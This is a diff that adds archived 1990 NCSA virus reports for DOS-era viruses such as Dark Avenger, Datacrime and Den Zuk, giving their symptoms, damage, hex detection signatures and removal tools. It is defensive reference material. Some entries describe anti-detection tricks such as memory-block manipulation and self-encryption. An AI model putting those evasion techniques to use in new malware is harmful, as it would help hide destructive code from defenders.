+Detected by: Scanv53+. + +Removed by: MDisk, Cleanup, or the DOS SYS command. + + Chaos overwrites the boot sector, and flags the disk as being full of +bad sectors upon activation, though these bad sectors are still +readable. The activation criteria are unknown. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa041.txt b/textfiles.com/virus/NCSA/ncsa041.txt new file mode 100644 index 00000000..a155b22d --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa041.txt @@ -0,0 +1,51 @@ + Ŀ + VIRUS REPORT + Christmas Card + + +Date of Origin: December, 1987. + +Host Machine: IBM E-mail system. + + This virus circulated a Christmas greeting throughout IBM's +worldwide E-mail system in December, 1987. The virus overloaded the +network, forcing IBM to shut it down temporarily. The virus was sent by +a West German law student to friends through a local European academic +research network. The virus told the receiver's computer to display the +greeting, then quietly send the virus and message to everyone on the +recipient's regular electronic mailing list. It turned out that someone +on the list had special, restricted access to IBM's E-mail network of +several thousand computers in 145 countries. IBM has since modified +their system to make repetition improbable. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa042.txt b/textfiles.com/virus/NCSA/ncsa042.txt new file mode 100644 index 00000000..9e242f8f --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa042.txt @@ -0,0 +1,60 @@ + Ŀ + VIRUS REPORT + Christmas Tree Virus + + +Synonyms: XA1, 1539 virus + +Date of Origin: March, 1990. + +Place of Origin: West Germany. + +Host Machine: PC compatibles. + +Host Files: COM files. Non-resident. + +OnScreen Symptoms: Between 12/24 and 1/1 will display a Christmas tree +on the screen. + +Increase in Size of Infected Files: 1,539 bytes. + +Nature of Damage: On April 1, running an infected program will destroy +the hard disk partition table. + +Detected by: Scan v61+. + +Removed by: Scan/D, or delete the infected files. + +Derived from: apparently an original. + + Discovered by Christoff Fischer, this virus displays the Christmas +tree on the screen when the system date is between December 24 and +January 1 and an infected program is executed. On April 1, it destroys +the partition table of the hard disk. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa043.txt b/textfiles.com/virus/NCSA/ncsa043.txt new file mode 100644 index 00000000..54f64950 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa043.txt @@ -0,0 +1,39 @@ + Ŀ + VIRUS REPORT + Chroma + + +Date of Origin: October, 1989. + +Host Machine: PC compatibles. + + Chroma appears to display a face and talk. While doing so, it places +itself throughout the hard disk and marks the sectors as unmovable +during de-fragmentation. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa044.txt b/textfiles.com/virus/NCSA/ncsa044.txt new file mode 100644 index 00000000..ea938070 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa044.txt @@ -0,0 +1,50 @@ + Ŀ + VIRUS REPORT + Clone Virus + + +Host Machine: PC compatibles. + +Host Files: boot sector infector. + +OnScreen Symptoms: none. + +Increase in Size of Infected Files: n/a + +Nature of Damage: destroys the FAT after May 5, 1992. + +Derived from: Brain-C + + This virus is the Brain-C that saves the original boot copyright +label and restores it to the infected boot. The Basit & [A]mjad original +Brain messages have been replaced with non-printable garbage that looks +like instructions if viewed through Norton or another utility. Even if +the system is booted from a clean diskette, it is virtually impossible to +tell, by visual inspection, whether the hard disk is infected. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa045.txt b/textfiles.com/virus/NCSA/ncsa045.txt new file mode 100644 index 00000000..3b955e07 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa045.txt @@ -0,0 +1,39 @@ + Ŀ + VIRUS REPORT + Clone-B + + +Host Machine: PC compatibles. + +Derived from: Clone virus. + + This is the Clone virus that has been revised to corrupt the FAT when +when your machine is booted after May 5, 1992. There are no other +apparent modifications. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa046.txt b/textfiles.com/virus/NCSA/ncsa046.txt new file mode 100644 index 00000000..14d941cd --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa046.txt @@ -0,0 +1,124 @@ + Ŀ + VIRUS REPORT + Dark Avenger + + +Synonyms: Black Avenger + +Date of Origin: September, 1989. + +Place of Origin: Sofia, Bulgaria. First isolated at U.C. Davis. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects COMMAND.COM, EXE, COM, overlay +files. + +Increase in Size of Infected Files: 1800 bytes. + +Nature of Damage: Affects system run-time operation. Corrupts program or +overlay files. Directly or indirectly corrupts file linkage. + +Detected by: Scanv36+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: M_DAV, CleanUp, F-Prot. + + The Dark Avenger originated in Sofia, Bulgaria, and was probably +imported to the U.S. in September, 1989 by some visiting math professors +at U.C. Davis. It was first reported by Randy Dean at the U.C. Davis +bookstore. + + It not only infects generic COM and EXE files, but will also infect +COMMAND.COM. Only files larger than 1,774 bytes will be infected. Once in COMMAND.COM, the virus will even +replicate through the DOS COPY and XCOPY commands, with both the source +and destination files being infected in the COPY process. The virus has +been named the Dark Avenger because this code appears within the virus. +The virus contains the words <197> "The Dark Avenger, copyright 1988, +1989" and the message <197> "This program was written in the city of +Sofia. Eddie lives.... Somewhere in Time!" + + The Dark Avenger increases the length of infected COM files by 1,800 +bytes. EXE files are rounded up to the next "paragraph", and the virus +is appended. + + The Dark Avenger stays resident in memory (via manipulation of +memory control blocks) and infects files via many DOS functions (such as +open, close, exec). For this reason, a file may become infected not only +when it is executed but even when viewed with PC Tools, when located with +some "FileFind" program, or when copied with COPY or XCOPY. During copy +commands, both source and target files become infected. + + When the Dark Avenger loads into memory, it begins by destroying the +resident portion of COMMAND.COM, which causes reloading of the transient +portion. At this time, the virus has already hooked the necessary +interrupt and COMMAND.COM is infected first. + + Although it stays resident, the Dark Avenger can't be detected by +many programs such as MAPMEM, MI, SMAP, and others. This is because when +a such a program is executed, the virus finds the program's own memory +control block (MCB) and changes it in a way that it looks like the last +of the chain of the MCBs (originally the MCB points to the next MCB in +which virus is located). This hint is especially designed to deceive +programs such as MAPMEM. + + In addition, in the boot sector, two variables are maintained (at +offset 0x08 and 0x0A). The latter is a counter to 15 (initialized to +major version of current PC/MS-DOS). It is incremented each time an +infected program is executed. When the counter reaches 16, the number +from the first variable is used to select a random disk sector, which is +then overwritten by the virus. If this sector is used by a file, the file +is destroyed. Should the directory sector be selected and overwritten, +the results are most unpleasant. + + When the Dark Avenger installs itself, it scans the ROMs of +additional controllers to find the address of the INT 0x13 handler (the +virus knows how it begins and looks for its own first bytes). After that, +it directly calls this address. As a result, it can't be detected by a +program waiting for INT 0x13. The Dark Avenger uses INT 0x26 for this, +and is detected by many antivirus programs (such as ANTI4US) with this +interrupt. The virus affects functions of PC/MS-DOS such as "SetVector" +and "Terminate And Stay Resident". + + If anti-virus software attempts to set some of the virus's vital +interrupts via "SetVector", the Dark Avenger will prohibit this. If the +anti-virus software directly changes the vector table, when the software +terminates (via "Terminate And Stay Resident"), the virus restores its +vectors. + + As an extremely infectious virus, treat it cautiously. Power down +the system with the on/off switch. Re-boot from a write-protected system +master diskette. Run SCAN or some other scanner to determine the extent +of infection. The virus could conceivably be widespread. A disinfector +(M_DAV), written by Morgan Schweers, is available on the National +Computer Security Association's BBS that can remove this virus. Be sure to re-scan the disk after you +think you are finished with disinfection. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa047.txt b/textfiles.com/virus/NCSA/ncsa047.txt new file mode 100644 index 00000000..84502266 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa047.txt @@ -0,0 +1,107 @@ + Ŀ + VIRUS REPORT + Datacrime + + +Synonyms: 1280 virus, Columbus Day, October 12th, October 13th, Friday +13th, Munich Virus, Miami Virus + +Date of Origin: March, 1989. + +Place of Origin: Europe. + +Host Machine: PC compatibles. + +Host Files: non-resident. Infects COM files. + +OnScreen Symptoms: No screen symptoms during propagation. After October +12 of any year, it will display the message "DATACRIME VIRUS RELEASED 1 +MARCH 1989". + +Increase in Size of Infected Files: 1280 bytes. + +Nature of Damage: Corrupts program or overlay files. Formats or erases +all/part of disk. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: AntiCrim, Scan/D, F-Prot, or CleanUp. + +Scan Code: 00 56 8D B4 30 05 CD 21 or 8B 36 01 01 83 EE 03 8B C6 3D 00 00 +75 03 E9 02 01. Uses self-encryption. You can also search at offset 000H +for 2E 8B 36 01 01 83 EE 03 8B C6. + + The 1280 version of Datacrime is the earliest version, followed by +the 1168 version. Both versions infect COM files, preserving the COM +file's date and time. This virus saves the first three bytes of its host +to a "save area" inside the virus shell, replacing them with a branch to +the beginning of the virus. It appends the shell to the end of the .COM +file on a paragraph boundary. The resulting file apparently must not +exceed 64K <197> the stack is at the top of the 64K file, where the shell +resides. The stack must have room for virus use. It is not +memory-resident. + + All versions of Datacrime activate after October 12th (hence the +name October 12). In 1989 <197> its year of release <197> the day after +October 12 was Friday the 13th (hence that name). Turning off your +computer on that day will not provide any protection against it. The +first time an infected program is run on or after Oct. 13, the virus will +search through hard drive partitions (C:, then D:, etc.), then the +directories of the A: and B: drives (in that order) for an uninfected COM +file other than COMMAND.COM. It will ignore any COM file with a D as the +seventh letter of its name (as in COMMAND.COM). It will then display the +message: "Datacrime virus released 1 March 1989" and do a low-level +format of cylinder 0 of the hard disk. + + Due to mistakes in the code, the system is almost certain to crash if +the DOS critical error handler is called (caused by a disk missing from a +drive, for example). If the computer has an ESDI, RLL, or SCSI +controller, the virus may be unsuccessful in formatting the hard disk. + + The effect of this formatting is to wipe out the FAT (file allocation +table) and the root directory, making the disk unreadable, except by +special utilities. + + Detection: + +* The original version of the Datacrime will not infect files until + after April 1st of the year (April Fool's Day). + +* The virus, depending on its variant, appends itself to .COM files + (except for COMMAND.COM), increasing the .COM file by either 1168 or + 1280 bytes. In addition, the Datacrime II variant can infect .EXE + files, increasing their size by 1514 bytes. + +* The 1168 byte version contains the hex string EB00B40ECD21B4. + +* The 1280 byte version contains the hex string 00568DB43005CD21. In + this version, you can also look for this ten-byte hex pattern: + 2E8B36010183EE038BC6. Note: the text message is encrypted, so it can't + be identified by a text string search or a disk utility. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa048.txt b/textfiles.com/virus/NCSA/ncsa048.txt new file mode 100644 index 00000000..342d2e82 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa048.txt @@ -0,0 +1,60 @@ + Ŀ + VIRUS REPORT + Datacrime-B + + +Synonyms: 1168 virus. + +Host Machine: PC compatibles. + +Host Files: EXE files. + +Increase in Size of Infected Files: 1168 bytes. + +Nature of Damage: Corrupts program or overlay files. Formats or erases +all/part of disk. + +Detected by: Scanv56+, F-Prot, IBM Scan. + +Removed by: CleanUp, AntiCrim, Scan/D, or F-Prot. + +Derived from: Datacrime (1280). + +Scan Code: EB 00 B4 0E CD 21 B4 or 8B 36 01 01 83 EE 03 8B C6 3D 00 00 75 +03 E9 FE 00. Uses self-encryption. + + This is the second version of the Datacrime virus. Differences +between this version and the original Datacrime: + +* EXE files are infected, COM files are not. + +* Files grow by 1168 bytes, rather than 1280 bytes. + + See the discussion of 1280/Datacrime above for major facts. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa049.txt b/textfiles.com/virus/NCSA/ncsa049.txt new file mode 100644 index 00000000..0d46f5f9 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa049.txt @@ -0,0 +1,64 @@ + Ŀ + VIRUS REPORT + Datacrime II (1514 variant) + + +Synonyms: 1514 virus, Columbus Day. + +Host Machine: PC compatibles. + +Host Files: COM (including COMMAND.COM) and EXE files. + +Increase in Size of Infected Files: 1514 bytes. + +Nature of Damage: Corrupts program or overlay files. Formats part of +hard disk on any date up to and including October 12, of any year, except +Sunday. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, AntiCrim, Scan/D, or F-Prot. + +Derived from: Datacrime. + +Scan Code: Uses self-encryption. 5E 81 EE 03 01 83 FE 00 74 2A 2E 8A 94. +You can also search at offset 022H for 2E 8A 07 2E C6 05 22 32 C2 D0. + + The major differences between this version and its predecessor: + +* the virus will add 1,514 bytes to infected files; + +* both COM and EXE files are infected; + +* the virus now uses self-encryption. + +* the virus will not format disks on Mondays. + + See the discussion of 1184 below. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa050.txt b/textfiles.com/virus/NCSA/ncsa050.txt new file mode 100644 index 00000000..f01ee3bc --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa050.txt @@ -0,0 +1,58 @@ + Ŀ + VIRUS REPORT + Datacrime II (1184 variant) + + +Synonyms: 1184 virus. + +Host Machine: PC compatibles. + +Host Files: COM files. + +OnScreen Symptoms: none. + +Increase in Size of Infected Files: 1184 bytes. + +Nature of Damage: Corrupts program or overlay files. Formats or erases +all/part of disk. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, AntiCrim, Scan/D, F-Prot. + +Derived from: DataCrime. + + This version is encrypted, so the hex pattern is not visible, but the +program can be detected by looking for COM files that are increased in +size by 1184 bytes. + + Datacrime 2 can be detected by running a good debugger and +single-stepping to find the end of the encryption routine (10 or 20 +instructions with obvious XOR's and a branch condition in front). + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa051.txt b/textfiles.com/virus/NCSA/ncsa051.txt new file mode 100644 index 00000000..ac9bd420 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa051.txt @@ -0,0 +1,63 @@ + Ŀ + VIRUS REPORT + Datacrime II-B + + +Synonyms: 1917 virus, Columbus Day + +Date of Origin: November, 1989. + +Place of Origin: Europe. Isolated by Jan Terpstra of the Netherlands. + +Host Machine: PC compatibles. + +Host Files: Non resident. Infects COMMAND.COM, EXE, COM files. + +OnScreen Symptoms: none. + +Increase in Size of Infected Files: 1917 bytes. + +Nature of Damage: Corrupts program or overlay files. Also formats or +erases part/all of the disk. + +Detected by: Scanv51+, F-Prot. + +Removed by: CleanUp, AntiCrim, Scan/D, F-Prot. + +Derived from: Datacrime II. + +Scan Code: encrypted. + + Differences between this virus and the Datacrime II virus: + +* Files increase in length by 1,917 bytes, rather than 1,184 bytes. + +* The encryption method used by the virus to escape detection is + different. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa052.txt b/textfiles.com/virus/NCSA/ncsa052.txt new file mode 100644 index 00000000..3195be02 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa052.txt @@ -0,0 +1,70 @@ + Ŀ + VIRUS REPORT + dBASE Virus + + +Synonyms: DBF virus + +Place of Origin: New York. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects COM files and overlay files. May +infect EXE files. + +Increase in Size of Infected Files: 1864 bytes. + +Nature of Damage: Corrupts DBF files. Affects system run-time operation. +Corrupts program or overlay files. + +Detected by: Scanv47+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, Scan/D, or F-Prot. + + Discovered by Ross Greenburg of New York, this is a memory resident +.COM/.OVL virus, which attempts to infect the dBASE program. When an +infected application is executed, the virus installs in memory, looking +for an open operation on .DBF files. Any writes to this file have two +bytes transposed at random. The virus keeps track of which files and +bytes have been altered using a file called BUG.DAT in the same directory +as the .DBF files. Reads of data are corrected by the resident portion of +the virus, thus data appear correct. However, when BUG.DAT is 90 days +old, the virus overwrites/nulls the root directory and FAT structures. +If the DBF file can be recovered, it will be recovered with non-obvious +errors. + + After this virus has been detected, if you remove the infected DBase +program and replace it with a clean copy, your DBF files that were opened +during the period that you were infected will be useless since they are +garbled on the disk even though they would be displayed as expected by +the infected Dbase program. To avoid file damage, keep multiple backups, +and keep hard copy of your transactions. Running a program such as +Deskview will permit you to look in your dBASE directory for BUG.DAT +during dBASE operations. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa053.txt b/textfiles.com/virus/NCSA/ncsa053.txt new file mode 100644 index 00000000..58810ea3 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa053.txt @@ -0,0 +1,117 @@ + Ŀ + VIRUS REPORT + Den Zuk + + +Synonyms: Venezuelan, The Search. + +Place of Origin: Indonesia? + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects floppy disk boot sector. + +OnScreen Symptoms: a purple "DEN ZUK" graphic will appear after a +CTRL-ALT-DEL is performed if the system has a CGA, EGA, or VGA monitor +and an infected floppy in drive A:. The rather pretty graphic slides in +from the sides of the screen. + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Affects system run-time operation. Corrupts or +overwrites boot sector of 360K floppies. The original causes no +intentional damage. Some variations may reformat a floppy disk after a +counter reaches a value of 5 to 10 (depending on the version.) + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: MDisk, F-Prot, or the DOS SYS command. + +Derived from: Ohio virus + +Scan Code: FA 8C C8 8E D8 8E D0 BC 00 F0 FB B8 78 7C 50 C3. You can also +search at 03EH for BB 90 7C 53 C3 B9 B0 7C 51 C3. + + Den Zuk (translation: "The Search") was written as an anti-virus +virus. Its target: Brain infections. When this virus finds a +Brain-infected diskette, it removes Brain and puts a copy of itself in +place. It also looks for old versions of itself and "upgrades" them if +necessary. The virus resides on track 40 on diskettes (normally 360K +diskettes only have tracks numbered 0-39), and thus takes up no usable +space. + + The virus was designed as a boot sector infector that infects 360KB 5 +1/4" floppies. It infects through any access to the host diskette. It can +survive a warm reboot. It will infect data (non-system) diskettes, which +in turn can pass on the infection if an accidental attempt to boot from +the data disk occurs. + + Den Zuk has a bug which causes it to attempt to infect 3.5" +diskettes. This will overwrite the diskette's FAT and cause a read (or +write) failure. It cannot infect a hard disk, and will not attempt to do +so. If an infected system is rebooted from the hard disk, the virus will +de-activate. This is not the case with rebooting from a clean floppy - +which will become infected. + + Den Zuk demonstrates what can (and will) go wrong with +anti-virus-viruses. The programmer did not anticipate 1.2M or 3.5" +diskettes. When the virus infects a disk of that type, it will destroy +data. Also, several "hacked" versions of this virus have been reported: + +* One variant will disable the SYS command and destroy all data on + drive C: on (Friday) September 13, 1991. + +* Another variant uses a counter which keeps track of how many times + the system has been rebooted. When the limit is reached (usually 5 to + 10 reboots), the drive A: floppy is reformatted. + + You may find the following text strings on infected disks: + +Welcome to the + +C l u b + +<197>The HackerS<197> + +Hackin' + +All The Time + +The HackerS + + If the virus has successfully removed the Brain, the volume label of +infected diskettes may be changed to "Y.C.1.E.R.P.". The Den Zuk virus +will also remove an Ohio virus infection before infecting the diskette +with Den Zuk, presumably because the Ohio is the first draft and a bit +cruder than Den Zuk. + + The Den Zuk virus was probably written by the same person as the Ohio +virus: the "Y.C.1.E.R.P." string is found in the Ohio virus, and the +viral code is similar in many respects. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa054.txt b/textfiles.com/virus/NCSA/ncsa054.txt new file mode 100644 index 00000000..c2b42d5d --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa054.txt @@ -0,0 +1,70 @@ + Ŀ + VIRUS REPORT + Devil's Dance + + +Synonyms: Mexican virus + +Date of Origin: December, 1989. + +Place of Origin: Reported by Mau Fragoso of Mexico City. + +Host Machine: PC compatibles. + +Host Files: Remains resident, infects COM files. + +OnScreen Symptoms: After a warm reboot, you will see the message "DID YOU +EVER DANCE WITH THE DEVIL IN THE WEAK MOONLIGHT? PRAY FOR YOUR DISKS!! +The Joker" Also, after your first 2,000 keystrokes, screen colors will +begin to change. + +Increase in Size of Infected Files: 941 bytes. + +Nature of Damage: Corrupts data files, program or overlay files, affects +system run-time operation, corrupts file linkage. + +Detected by: Scanv52+. + +Removed by: CleanUp, Scan/D, or delete infected files. + + This virus will infect a file multiple times until the file becomes +too large to fit in available memory. Once an infected program has been +run, any subsequent warm boot (CTRL-ALT-DEL) will result in the message +noted above. + + The Devil's Dance virus is destructive. + +* After the first 2,000 keystrokes, the virus starts changing the + colors of text displayed on the monitor. + +* After the first 5,000 keystrokes, the virus erases the first copy of + the FAT. At this point, 